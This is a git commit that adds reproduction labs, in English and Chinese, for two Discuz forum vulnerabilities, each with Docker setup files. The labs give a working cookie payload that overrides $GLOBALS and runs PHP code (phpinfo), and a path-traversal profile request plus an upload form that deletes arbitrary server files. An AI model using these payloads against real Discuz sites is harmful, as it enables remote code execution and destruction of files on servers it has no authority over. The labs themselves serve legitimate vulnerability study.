first commit

discuz/wooyun-2010-080723/README.md

@@ -0,0 +1,51 @@
+# Discuz 7.x/6.x Remote Code Execution via Global Variable Override
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Discuz is a popular forum software widely used in China. A remote code execution vulnerability exists in Discuz 7.x/6.x versions due to insufficient global variable protection.
+
+In PHP 5.3.x, the default value of `request_order` in php.ini is set to "GP", which means `$_REQUEST` no longer includes `$_COOKIE` by default. This allows attackers to override global variables through cookies by injecting `$GLOBALS`, leading to remote code execution.
+
+References:
+
+- <https://www.secpulse.com/archives/2338.html>
+
+## Environment Setup
+
+Execute the following command to start Discuz 7.2:
+
+```
+docker compose up -d
+```
+
+After starting the container, visit `http://your-ip:8080/install/` to install Discuz. Use the following database settings:
+
+- Database Host: `db`
+- Database Name: `discuz`
+- Username: `root`
+- Password: `root`
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+After installation, find an existing post and send a request with the following cookie that contains the payload `GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();`:
+
+```
+GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
+Connection: close
+
+
+```
+
+The `phpinfo()` function will be successfully executed, demonstrating the remote code execution vulnerability:
+
+![](2.png)
+
+> Note: Some articles online claim that a post with an emoji comment is required, but the actual test found that it was not necessary, and the reason still needs to be analyzed from the code.

discuz/wooyun-2010-080723/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Discuz 7.x/6.x 全局变量防御绕过导致代码执行漏洞
+
+Discuz是一个广泛使用的论坛软件系统。在Discuz 7.x/6.x版本中存在一个由于全局变量保护不足导致的远程代码执行漏洞。
+
+由于PHP 5.3.x版本中php.ini的设置里`request_order`默认值为"GP"，导致`$_REQUEST`中不再包含`$_COOKIE`数据。攻击者可以通过在Cookie中传入`$GLOBALS`来覆盖全局变量，最终造成远程代码执行漏洞。
+
+参考链接：
+
+- <https://www.secpulse.com/archives/2338.html>
+
+## 环境搭建
+
+执行如下命令启动Discuz 7.2：
+
+```
+docker compose up -d
+```
+
+启动后，访问`http://your-ip:8080/install/`来安装Discuz，使用以下数据库配置：
+
+- 数据库地址：`db`
+- 数据库名：`discuz`
+- 数据库账号：`root`
+- 数据库密码：`root`
+
+![](1.png)
+
+## 漏洞复现
+
+安装成功后，找到一个已存在的帖子，向其发送数据包，并在Cookie中增加payload `GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();`：
+
+```
+GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
+Connection: close
+```
+
+可以看到`phpinfo()`函数被成功执行，证明远程代码执行漏洞利用成功：
+
+![](2.png)

discuz/wooyun-2010-080723/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+  discuz:
+    image: vulhub/discuz:7.2
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+  db:
+    image: mysql:5.5
+    environment: 
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: discuz

discuz/x3.4-arbitrary-file-deletion/README.md

@@ -0,0 +1,85 @@
+# Discuz!X ≤3.4 Arbitrary File Deletion
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Discuz!X is a popular forum software widely used in China. A vulnerability in Discuz!X versions 3.4 and below allows attackers to delete arbitrary files on the server through the user profile modification functionality.
+
+References:
+
+- <https://lorexxar.cn/2017/09/30/dz-delete/>
+
+## Environment Setup
+
+Execute the following command to deploy Discuz!X 3.4:
+
+```
+docker compose up -d
+```
+
+During installation, only modify the database host to `db` and keep other settings as default:
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+First, verify that the target file (e.g., robots.txt) exists by visiting `http://your-ip/robots.txt`:
+
+![](2.png)
+
+After registering a user account, find your formhash value in the personal settings page:
+
+![](4.png)
+
+Send the following HTTP request with your cookie and formhash:
+
+```
+POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
+Host: localhost
+Content-Length: 367
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
+Cookie: [your cookie]
+Connection: close
+
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="formhash"
+
+[your formhash]
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="birthprovince"
+
+../../../robots.txt
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="profilesubmit"
+
+1
+------WebKitFormBoundaryPFvXyxL45f34L12s--
+```
+
+After successful submission, the birthplace field in the user profile page will show the following state:
+
+![](5.png)
+
+This indicates that our malicious data has been inserted into the database.
+
+Next, create an `upload.html` file with the following code (replace `[your-ip]` with your Discuz domain and `[form-hash]` with your formhash):
+
+```html
+<body>
+    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
+        <input type="file" name="birthprovince" />
+        <input type="submit" value="upload" />
+    </form>
+</body>
+```
+
+Open this page in a browser and upload a normal image file. At this point, the malicious data should have been processed and the vulnerability exploitation is complete.
+
+Visit `http://your-ip/robots.txt` again to verify that the file has been successfully deleted:
+
+![](6.png)

discuz/x3.4-arbitrary-file-deletion/README.zh-cn.md

@@ -0,0 +1,83 @@
+# Discuz!X ≤3.4 任意文件删除漏洞
+
+Discuz!X是一个广泛使用的论坛软件系统。在Discuz!X 3.4及以下版本中存在一个任意文件删除漏洞，攻击者可以通过用户资料修改功能删除服务器上的任意文件。
+
+参考链接：
+
+- <https://lorexxar.cn/2017/09/30/dz-delete/>
+
+## 环境搭建
+
+执行下列命令部署Discuz!X安装环境：
+
+```
+docker compose up -d
+```
+
+安装时，只需修改数据库地址为`db`，其他配置保持默认即可：
+
+![](1.png)
+
+## 漏洞复现
+
+首先，访问`http://your-ip/robots.txt`确认目标文件（如robots.txt）存在：
+
+![](2.png)
+
+注册用户后，在个人设置页面找到自己的formhash值：
+
+![](4.png)
+
+发送如下HTTP请求，注意替换其中的cookie和formhash值：
+
+```
+POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
+Host: localhost
+Content-Length: 367
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
+Cookie: [你的cookie]
+Connection: close
+
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="formhash"
+
+[你的formhash]
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="birthprovince"
+
+../../../robots.txt
+------WebKitFormBoundaryPFvXyxL45f34L12s
+Content-Disposition: form-data; name="profilesubmit"
+
+1
+------WebKitFormBoundaryPFvXyxL45f34L12s--
+```
+
+提交成功后，用户资料修改页面上的出生地会显示如下状态：
+
+![](5.png)
+
+这表明我们的恶意数据已经成功写入数据库。
+
+接下来，创建一个`upload.html`文件，代码如下（将`[your-ip]`替换为你的Discuz域名，`[form-hash]`替换为你的formhash值）：
+
+```html
+<body>
+    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
+        <input type="file" name="birthprovince" />
+        <input type="submit" value="upload" />
+    </form>
+</body>
+```
+
+用浏览器打开该页面并上传一个普通图片文件。此时，恶意数据应该已被处理，漏洞利用完成。
+
+再次访问`http://your-ip/robots.txt`，可以验证文件已被成功删除：
+
+![](6.png)

discuz/x3.4-arbitrary-file-deletion/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+  discuz:
+    image: vulhub/discuz:x3.4
+    depends_on:
+      - db
+    ports:
+      - "80:80"
+  db:
+    image: mysql:5.5
+    environment: 
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: ultrax